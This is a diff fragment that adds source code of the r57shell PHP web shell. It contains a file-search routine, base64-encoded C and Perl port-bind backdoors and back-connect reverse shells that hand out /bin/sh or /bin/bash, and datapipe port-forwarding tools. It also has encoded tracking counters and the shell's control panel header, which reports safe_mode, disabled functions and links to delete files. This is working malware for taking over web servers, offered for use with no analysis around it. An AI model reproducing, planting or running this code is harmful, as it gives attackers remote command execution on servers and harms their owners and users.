+      $this->titles = Array();
+    }
+
+    function GetFilesTotal() { return $this->FilesTotal; }
+    function GetTitles() { return $this->titles; }
+    function GetTimeTotal() { return $this->TimeTotal; }
+    function GetMatchesCount() { return $this->MatchesCount; }
+    function GetFileMatchesCount() { return $this->FileMatchesCount; }
+    function GetResultFiles() { return $this->ResultFiles; }
+    function SearchText($phrase=0,$case=0) {
+    $qq = @explode(' ',$this->text);
+    $delim = '|';
+      if($phrase)
+        foreach($qq as $k=>$v)
+          $qq[$k] = '\b'.$v.'\b';
+      $words = '('.@implode($delim,$qq).')';
+      $pattern = "/".$words."/";
+      if(!$case)
+        $pattern .= 'i';
+      foreach($this->FilesToSearch as $k=>$filename)
+      {
+        $this->FileMatchesCount[$filename] = 0;
+        $FileStrings = @file($filename) or @next;
+        for($a=0;$a<@count($FileStrings);$a++)
+        {
+          $count = 0;
+          $CurString = $FileStrings[$a];
+          $CurString = @Trim($CurString);
+          $CurString = @strip_tags($CurString);
+          if($count = @preg_match_all($pattern,$CurString,$aa))
+          {
+            $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString);
+            $this->ResultFiles[$filename][$a+1] = $CurString;
+            $this->MatchesCount += $count;
+            $this->FileMatchesCount[$filename] += $count;
+          }
+        }
+      }
+      $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4);
+    }
+  }
+
+  function getmicrotime()
+  {
+    list($usec,$sec) = @explode(" ",@microtime());
+    return ((float)$usec + (float)$sec);
+  }
+
+/*** base64 ---------------------------------------------------------------------------------------------------- */
+/* --- Port bind source C -------------------------------------------------------------------------------------- */
+$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
+A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
+GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
+b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
+pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
+NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
+ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
+ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
+7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
+9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
+2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
+dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
+lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
+/* --- END Port bind source C ---------------------------------------------------------------------------------- */
+/* --- Port bind source PERL ----------------------------------------------------------------------------------- */
+$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
+VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
+JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
+TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
+lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
+Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
+Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
+lIENPTk47DQpleGl0IDA7DQp9DQp9";
+/* --- END Port bind source PERL ------------------------------------------------------------------------------- */
+/* --- Back connect source PERL -------------------------------------------------------------------------------- */
+$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
+aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
+hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
+sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
+kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
+KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
+OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+/* --- END Back connect source PERL ---------------------------------------------------------------------------- */
+/* --- Back connect source C ----------------------------------------------------------------------------------- */
+$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
+BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
+SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
+KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
+sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
+Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
+QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
+Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
+/* --- END Back connect source C ------------------------------------------------------------------------------- */
+/* --- datapipe.c ---------------------------------------------------------------------------------------------- */
+$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2
+x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb
+HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj
+aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ
+lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm
+xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga
+W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy
+LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV
+udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow
+0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb
+iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l
+KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA
+gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS
+hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC
+iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh
+ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ
+vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC
+AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D
+QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh
+ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0
+gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay
+wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c
+29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy
+MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA
+gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci
+5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ
+HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu
+dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0
+KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC
+ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI
+E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp
+Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs
+NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG
+J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL
+CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp
+dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo
+gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm
+lsZSk7DQogIHJldHVybiAwOw0KfQ==";
+/* --- END datapipe.c ------------------------------------------------------------------------------------------ */
+/* --- datapipe.pl --------------------------------------------------------------------------------------------- */
+$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I
+CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl
+bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU
+gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol
+NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC
+iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy
+aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ
+SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2
+xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ
+WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN
+CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9
+yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi
+I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc
+m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp
+IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ
+lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW
+QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK
+CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g
+c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0
+NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG
+UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I
+DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs
+ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
+1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";
+/* --- END datapipe.pl ----------------------------------------------------------------------------------------- */
+$c1 = "PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90bG9nX2pzPSIxLjAiO2hvdGxvZ19yPSIiK01hdGgucmFuZG9tKCkrIiZzPTgxNjA2
+JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIiZwZz0iK2VzY2FwZSh3aW5kb3cubG9jYXRpb24uaHJlZik7ZG9jdW1lbnQuY29va2l
+lPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iKyhkb2N1bWVudC5jb29raWU/IlkiOiJOIik7PC9zY3JpcHQ+PHNjcmlwdCBsYW5ndW
+FnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2pzPSIxLjEiO2hvdGxvZ19yKz0iJmo9IisobmF2aWdhdG9yLmphdmFFbmFibGVkKCk/IlkiOiJOIik8L
+3NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9nX3IrPSImd2g9IitzY3JlZW4ud2lkdGgr
+J3gnK3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci5hcHBOYW1lLnN1YnN0cmluZygwLDMpPT0iTWljIikpP3NjcmVlbi5jb2xvckRlcHR
+oOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQxLjMiPmhvdGxvZ19qcz0iMS4zIjwvc2NyaXB0Pj
+xzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19yKz0iJmpzPSIraG90bG9nX2pzO2RvY3VtZW50LndyaXRlKCI8YSBocmVmPSdodHRwO
+i8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9wJz48aW1nICIrIiBzcmM9J2h0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2hv
+dGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIGFsdD0xPjwvYT4iKTwvc2NyaXB0Pjxub3NjcmlwdD48YSB
+ocmVmPWh0dHA6Ly9jbGljay5ob3Rsb2cucnUvPzgxNjA2IHRhcmdldD1fdG9wPjxpbWdzcmM9Imh0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2
+hvdGxvZy9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lkdGg9IjEiIGhlaWdodD0iMSIgYWx0PSJIb3RMb2ciPjwvYT48L25vc2NyaXB0Pg==";
+$c2 = "PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCI+PCEtLQ0KZG9jdW1lbnQud3JpdGUoJzxh
+IGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaWNrIiAnKw0KJ3RhcmdldD1fYmxhbms+PGltZyBzcmM9Imh0dHA6Ly9jb3VudGVyLnl
+hZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrKCh0eXBlb2Yoc2NyZWVuKT09J3VuZGVmaW5lZCcpPycnOg0KJz
+tzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5oZWlnaHQrJyonKyhzY3JlZW4uY29sb3JEZXB0aD8NCnNjcmVlbi5jb2xvckRlcHRoOnNjcmVlbi5wa
+XhlbERlcHRoKSkrJzsnK01hdGgucmFuZG9tKCkrDQonIiBhbHQ9ImxpdmVpbnRlcm5ldC5ydTog7+7q4Ofg7e4g9+jx6+4g7/Du8ezu8vDu4iDoIO/u
+8eXy6PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2lkdGg9MCBoZWlnaHQ9MD48L2E+JykvLy0tPjwvc2NyaXB0PjwhLS0vTGl2ZUludGV
+ybmV0LS0+";
+/*** END base64 ------------------------------------------------------------------------------------------------ */
+
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* LOGO + info */
+echo $head;
+echo '</head>
+<body bgcolor="#e4e0d8">
+<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
+<tr><td bgcolor=#cccccc width=160>
+<!-- logo -->
+<font face=Verdana size=2>'.ws(1).'&nbsp;
+<font face=Webdings size=6><b>!</b></font><b>'.ws(2).'r57shell '.$version.'</b>
+</font></td><td bgcolor=#cccccc><font face=Verdana size=-2>';
+$si = 3;
+echo ws(2);
+echo "<b>".date ("d-m-Y H:i:s")."</b>";
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb."<br>";
+echo ws(2);
+echo (($safe_mode)?("safe_mode: <b>ON</b>"):("safe_mode: <b>OFF</b>"));
+echo ws(2);
+echo "PHP version: <b>".@phpversion()."</b>";
+$curl_on = @function_exists('curl_version');
+echo ws(2);
+echo "cURL: ".(($curl_on)?("<b>ON (".@curl_version().")</b>"):("<b>OFF</b>"));
+echo ws(2);
+echo "MySQL: <b>";
+$mysql_on = @function_exists('mysql_connect');
+if($mysql_on)
+ {
+ $client_api = @function_exists('mysql_get_client_info') ? @mysql_get_client_info() : "";
+ echo "ON ($client_api)</b>";
+ }
+else
+ {
+ echo "OFF</b>";
+ }
+echo "<br>".ws(2);
+echo "Disable functions : <b>";
+$df = @ini_get('disable_functions');
+if(empty($df)) echo "NONE</b>"; else echo "$df</b>";
